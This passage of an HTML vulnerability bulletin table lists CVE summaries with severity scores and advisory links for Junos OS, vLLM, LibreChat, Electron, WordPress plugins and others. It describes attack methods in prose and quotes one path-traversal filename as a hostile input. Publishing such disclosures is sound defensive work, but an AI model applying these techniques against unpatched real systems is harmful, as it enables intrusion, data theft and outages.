    <td>Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, any authenticated user (including ROLE_STUDENT) can enumerate all platform users and access personal information (email, phone, roles) via GET /api/users, including administrator accounts. This vulnerability is fixed in 2.0.0-RC.3.</td>
    <td>2026-04-10</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33736" target="_blank" rel="noopener">CVE-2026-33736</a></td>
    <td><a href="https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-fp2p-fj6c-x3x9</a><br><a href="https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109" target="_blank" rel="noopener">https://github.com/chamilo/chamilo-lms/commit/1739371ce1c562c007c7f5d53e6d65b7a4ff4109</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">trailofbits--rfc3161-client</td>
    <td>rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6.</td>
    <td>2026-04-08</td>
    <td>6.2</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33753" target="_blank" rel="noopener">CVE-2026-33753</a></td>
    <td><a href="https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj" target="_blank" rel="noopener">https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the configured firewall filter and access the control-plane of the device. On MX platforms with MPC10, MPC11, LC4800 or LC9600 line cards, and MX304, firewall filters applied on a loopback interface lo0.n (where n is a non-0 number) don't get executed when lo0.n is in the global VRF / default routing-instance. An affected configuration would be: user@host# show configuration interfaces lo0 | display set set interfaces lo0 unit 1 family inet filter input &lt;filter-name&gt; where a firewall filter is applied to a non-0 loopback interface, but that loopback interface is not referred to in any routing-instance (RI) configuration, which implies that it's used in the default RI. The issue can be observed with the CLI command: user@device&gt; show firewall counter filter &lt;filter_name&gt; not showing any matches. This issue affects Junos OS on MX Series: * all versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2, * 24.4 versions before 24.4R2.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33774" target="_blank" rel="noopener">CVE-2026-33774</a></td>
    <td><a href="https://kb.juniper.net/JSA107865" target="_blank" rel="noopener">https://kb.juniper.net/JSA107865</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Release of Memory after Effective Lifetime vulnerability in the BroadBand Edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If the authentication packet-type option is configured and a received packet does not match that packet type, the memory leak occurs. When all memory available to bbe-smgd has been consumed, no new subscribers will be able to login. The memory utilization of bbe-smgd can be monitored with the following show command: user@host&gt; show system processes extensive | match bbe-smgd The below log message can be observed when this limit has been reached: bbesmgd[&lt;PID&gt;]: %DAEMON-3-SMD_DPROF_RSMON_ERROR: Resource unavailability, Reason: Daemon Heap Memory exhaustion This issue affects Junos OS on MX Series: * all versions before 22.4R3-S8, * 23.2 versions before 23.2R2-S5, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S2, * 24.4 versions before 24.4R2, * 25.2 versions before 25.2R2.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33775" target="_blank" rel="noopener">CVE-2026-33775</a></td>
    <td><a href="https://kb.juniper.net/JSA107821" target="_blank" rel="noopener">https://kb.juniper.net/JSA107821</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Following of a Certificate's Chain of Trust vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows a PITM to intercept the communication of the device and get access to confidential information and potentially modify it. When an SRX device is provisioned to connect to Security Director (SD) cloud, it doesn't perform sufficient verification of the received server certificate. This allows a PITM to intercept the communication between the SRX and SD cloud and access credentials and other sensitive information. This issue affects Junos OS: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R1-S2, 25.2R2.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33779" target="_blank" rel="noopener">CVE-2026-33779</a></td>
    <td><a href="https://kb.juniper.net/JSA107823" target="_blank" rel="noopener">https://kb.juniper.net/JSA107823</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Release of Memory after Effective Lifetime vulnerability in the Layer 2 Address Learning Daemon (l2ald) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent, unauthenticated attacker to cause a memory leak ultimately leading to a Denial of Service (DoS). In an EVPN-MPLS scenario, routes learned from remote multi-homed Provider Edge (PE) devices are programmed as ESI routes. Due to a logic issue in the l2ald memory management, memory allocated for these routes is not released when there is churn for these routes. As a result, memory leaks in the l2ald process which will ultimately lead to a crash and restart of l2ald. Use the following command to monitor the memory consumption by l2ald: user@device&gt; show system process extensive | match "PID|l2ald" This issue affects: Junos OS: * all versions before 22.4R3-S5, * 23.2 versions before 23.2R2-S3, * 23.4 versions before 23.4R2-S4, * 24.2 versions before 24.2R2; Junos OS Evolved: * all versions before 22.4R3-S5-EVO, * 23.2 versions before 23.2R2-S3-EVO, * 23.4 versions before 23.4R2-S4-EVO, * 24.2 versions before 24.2R2-EVO.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33780" target="_blank" rel="noopener">CVE-2026-33780</a></td>
    <td><a href="https://kb.juniper.net/JSA107819" target="_blank" rel="noopener">https://kb.juniper.net/JSA107819</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An Improper Check for Unusual or Exceptional Conditions vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX and QFX Series devices allows an unauthenticated, adjacent attacker to cause a complete Denial of Service (DoS). On EX4k, and QFX5k platforms configured as service-provider edge devices, if L2PT is enabled on the UNI and VSTP is enabled on NNI in VXLAN scenarios, receiving VSTP BPDUs on UNI leads to packet buffer allocation failures, resulting in the device to not pass traffic anymore until it is manually recovered with a restart. This issue affects Junos OS: * 24.4 releases before 24.4R2, * 25.2 releases before 25.2R1-S1, 25.2R2. This issue does not affect Junos OS releases before 24.4R1.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33781" target="_blank" rel="noopener">CVE-2026-33781</a></td>
    <td><a href="https://kb.juniper.net/JSA107869" target="_blank" rel="noopener">https://kb.juniper.net/JSA107869</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>A Missing Release of Memory after Effective Lifetime vulnerability in the DHCP daemon (jdhcpd) of Juniper Networks Junos OS on MX Series, allows an adjacent, unauthenticated attacker to cause a memory leak, that will eventually cause a complete Denial-of-Service (DoS). In a DHCPv6 over PPPoE, or DHCPv6 over VLAN with Active lease query or Bulk lease query scenario, every subscriber logout will leak a small amount of memory. When all available memory has been exhausted, jdhcpd will crash and restart which causes a complete service impact until the process has recovered. The memory usage of jdhcpd can be monitored with: user@host&gt; show system processes extensive | match jdhcpd This issue affects Junos OS: * all versions before 22.4R3-S1, * 23.2 versions before 23.2R2, * 23.4 versions before 23.4R2.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33782" target="_blank" rel="noopener">CVE-2026-33782</a></td>
    <td><a href="https://kb.juniper.net/JSA107820" target="_blank" rel="noopener">https://kb.juniper.net/JSA107820</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS Evolved</td>
    <td>A Function Call With Incorrect Argument Type vulnerability in the sensor interface of Juniper Networks Junos OS Evolved on PTX Series allows a network-based, authenticated attacker with low privileges to cause a complete Denial of Service (DoS). If colored SRTE policy tunnels are provisioned via PCEP, and gRPC is used to monitor traffic in these tunnels, evo-aftmand crashes and doesn't restart which leads to a complete and persistent service impact. The system has to be manually restarted to recover. The issue is seen only when the Originator ASN field in PCEP contains a value larger than 65,535 (32-bit ASN). The issue is not reproducible when SRTE policy tunnels are statically configured. This issue affects Junos OS Evolved on PTX Series: * all versions before 22.4R3-S9-EVO, * 23.2 versions before 23.2R2-S6-EVO, * 23.4 versions before 23.4R2-S7-EVO, * 24.2 versions before 24.2R2-S4-EVO, * 24.4 versions before 24.4R2-S2-EVO, * 25.2 versions before 25.2R1-S2-EVO, 25.2R2-EVO.</td>
    <td>2026-04-09</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33783" target="_blank" rel="noopener">CVE-2026-33783</a></td>
    <td><a href="https://kb.juniper.net/JSA107870" target="_blank" rel="noopener">https://kb.juniper.net/JSA107870</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Juniper Networks--Junos OS</td>
    <td>An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system. Certain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. These shell commands are executed as root, potentially allowing for complete control of the vulnerable system. This issue affects: Junos OS: * all versions before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S2, * from 24.4 before 24.4R2, * from 25.2 before 25.2R2; Junos OS Evolved: * all versions before 22.4R3-S8-EVO, * from 23.2 before 23.2R2-S5-EVO, * from 23.4 before 23.4R2-S7-EVO, * from 24.2 before 24.2R2-S2-EVO, * from 24.4 before 24.4R2-EVO, * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.</td>
    <td>2026-04-09</td>
    <td>6.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-33791" target="_blank" rel="noopener">CVE-2026-33791</a></td>
    <td><a href="https://kb.juniper.net/JSA107875" target="_blank" rel="noopener">https://kb.juniper.net/JSA107875</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">danny-avila--LibreChat</td>
    <td>LibreChat is a ChatGPT clone with additional features. Prior to 0.8.4, LibreChat trusts the name field returned by the execute_code sandbox when persisting code-generated artifacts. On deployments using the default local file strategy, a malicious artifact filename containing traversal sequences (for example, ../../../../../app/client/dist/poc.txt) is concatenated into the server-side destination path and written with fs.writeFileSync() without sanitization. This gives any user who can trigger execute_code an arbitrary file write primitive as the LibreChat server user. This vulnerability is fixed in 0.8.4.</td>
    <td>2026-04-07</td>
    <td>6.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34371" target="_blank" rel="noopener">CVE-2026-34371</a></td>
    <td><a href="https://github.com/danny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692" target="_blank" rel="noopener">https://github.com/danny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">AcademySoftwareFoundation--openexr</td>
    <td>OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.4.0 to before 3.4.9, a missing bounds check on the dataWindow attribute in EXR file headers allows an attacker to trigger a signed integer overflow in generic_unpack(). By setting dataWindow.min.x to a large negative value, OpenEXRCore computes an enormous image width, which is later used in a signed integer multiplication that overflows, causing the process to terminate with SIGILL via UBSan. This vulnerability is fixed in 3.4.9.</td>
    <td>2026-04-06</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34378" target="_blank" rel="noopener">CVE-2026-34378</a></td>
    <td><a href="https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g</a><br><a href="https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9" target="_blank" rel="noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">vllm-project--vllm</td>
    <td>vLLM is an inference and serving engine for large language models (LLMs). From 0.7.0 to before 0.19.0, the VideoMediaIO.load_base64() method at vllm/multimodal/media/video.py splits video/jpeg data URLs by comma to extract individual JPEG frames, but does not enforce a frame count limit. The num_frames parameter (default: 32), which is enforced by the load_bytes() code path, is completely bypassed in the video/jpeg base64 path. An attacker can send a single API request containing thousands of comma-separated base64-encoded JPEG frames, causing the server to decode all frames into memory and crash with OOM. This vulnerability is fixed in 0.19.0.</td>
    <td>2026-04-06</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34755" target="_blank" rel="noopener">CVE-2026-34755</a></td>
    <td><a href="https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p" target="_blank" rel="noopener">https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">vllm-project--vllm</td>
    <td>vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.19.0, a Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large n value. This completely blocks the Python asyncio event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue. This vulnerability is fixed in 0.19.0.</td>
    <td>2026-04-06</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34756" target="_blank" rel="noopener">CVE-2026-34756</a></td>
    <td><a href="https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528" target="_blank" rel="noopener">https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528</a><br><a href="https://github.com/vllm-project/vllm/pull/37952" target="_blank" rel="noopener">https://github.com/vllm-project/vllm/pull/37952</a><br><a href="https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380" target="_blank" rel="noopener">https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">electron--electron</td>
    <td>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, when a renderer calls window.open() with a target name, Electron did not correctly scope the named-window lookup to the opener's browsing context group. A renderer could navigate an existing child window that was opened by a different, unrelated renderer if both used the same target name. If that existing child was created with more permissive webPreferences (via setWindowOpenHandler's overrideBrowserWindowOptions), content loaded by the second renderer inherits those permissions. Apps are only affected if they open multiple top-level windows with differing trust levels and use setWindowOpenHandler to grant child windows elevated webPreferences such as a privileged preload script. Apps that do not elevate child window privileges, or that use a single top-level window, are not affected. Apps that additionally grant nodeIntegration: true or sandbox: false to child windows (contrary to the security recommendations) may be exposed to arbitrary code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.</td>
    <td>2026-04-07</td>
    <td>6</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34765" target="_blank" rel="noopener">CVE-2026-34765</a></td>
    <td><a href="https://github.com/electron/electron/security/advisories/GHSA-f3pv-wv63-48x8" target="_blank" rel="noopener">https://github.com/electron/electron/security/advisories/GHSA-f3pv-wv63-48x8</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">burlingtonbytes--WP Blockade Visual Page Builder</td>
    <td>The WP Blockade plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 0.9.14. The plugin registers an admin_post action hook 'wp-blockade-shortcode-render' that maps to the render_shortcode_preview() function. This function lacks any capability check (current_user_can()) and nonce verification, allowing any authenticated user to execute arbitrary WordPress shortcodes. The function takes a user-supplied 'shortcode' parameter from $_GET, passes it through stripslashes(), and directly executes it via do_shortcode(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes, which could lead to information disclosure, privilege escalation, or other impacts depending on what shortcodes are registered on the site (e.g., shortcodes from other plugins that display sensitive data, perform actions, or include files).</td>
    <td>2026-04-08</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-3480" target="_blank" rel="noopener">CVE-2026-3480</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092b-4655-9d97-a496ac01738c?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092b-4655-9d97-a496ac01738c?source=cve</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112</a><br><a href="https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112</a><br>&nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">David Lingren--Media Library Assistant</td>
    <td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Lingren Media Library Assistant allows Stored XSS. This issue affects Media Library Assistant: from n/a through 3.34.</td>
    <td>2026-04-06</td>
    <td>6.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-34897" target="_blank" rel="noopener">CVE-2026-34897</a></td>
    <td><a href="https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank" rel="noopener">https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerability?_s_id=cve</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Red Hat--mirror registry for Red Hat OpenShift</td>
    <td>A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation.</td>
    <td>2026-04-08</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14243" target="_blank" rel="noopener">CVE-2025-14243</a></td>
    <td><a href="https://access.redhat.com/security/cve/CVE-2025-14243" target="_blank" rel="noopener">https://access.redhat.com/security/cve/CVE-2025-14243</a><br>
    <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2419829" target="_blank" rel="noopener">RHBZ#2419829</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">inisev--BackupBliss Backup &amp; Migration with Free Cloud Storage</td>
    <td>The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion.</td>
    <td>2026-04-07</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-14944" target="_blank" rel="noopener">CVE-2025-14944</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">johanaarstein--AM LottiePlayer</td>
    <td>The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
    <td>2026-04-08</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-1794" target="_blank" rel="noopener">CVE-2025-1794</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">Hitachi--JP1/IT Desktop Management 2 - Manager</td>
    <td>Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.</td>
    <td>2026-04-07</td>
    <td>5.5</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2025-65116" target="_blank" rel="noopener">CVE-2025-65116</a></td>
    <td><a href="https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html" target="_blank" rel="noopener">https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">vsourz1td--Advanced Contact form 7 DB</td>
    <td>The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the 'vsz_cf7_save_setting_callback' function. This makes it possible for unauthenticated attackers to delete form entries via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.</td>
    <td>2026-04-08</td>
    <td>5.4</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-0811" target="_blank" rel="noopener">CVE-2026-0811</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L885" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L885</a><br>
    <a href="https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">GitLab--GitLab</td>
    <td>GitLab has remediated an issue in GitLab EE affecting all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in Code Quality reports could have allowed an authenticated user to leak IP addresses of users viewing the report via specially crafted content.</td>
    <td>2026-04-08</td>
    <td>5.7</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-1516" target="_blank" rel="noopener">CVE-2026-1516</a></td>
    <td><a href="https://hackerone.com/reports/3514461" target="_blank" rel="noopener">HackerOne Bug Bounty Report #3514461</a><br>
    <a href="https://gitlab.com/gitlab-org/gitlab/-/work_items/587893" target="_blank" rel="noopener">https://gitlab.com/gitlab-org/gitlab/-/work_items/587893</a><br>
    <a href="https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/" target="_blank" rel="noopener">https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/</a><br>
    &nbsp;</td>
    </tr>

    <tr>
    <td class="vendor-product">wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups</td>
    <td>The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics.</td>
    <td>2026-04-07</td>
    <td>5.3</td>
    <td><a href="https://www.cve.org/CVERecord?id=CVE-2026-2263" target="_blank" rel="noopener">CVE-2026-2263</a></td>
    <td><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve" target="_blank" rel="noopener">https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32</a><br>
    <a href="https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047" target="_blank" rel="noopener">https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047</a><br>
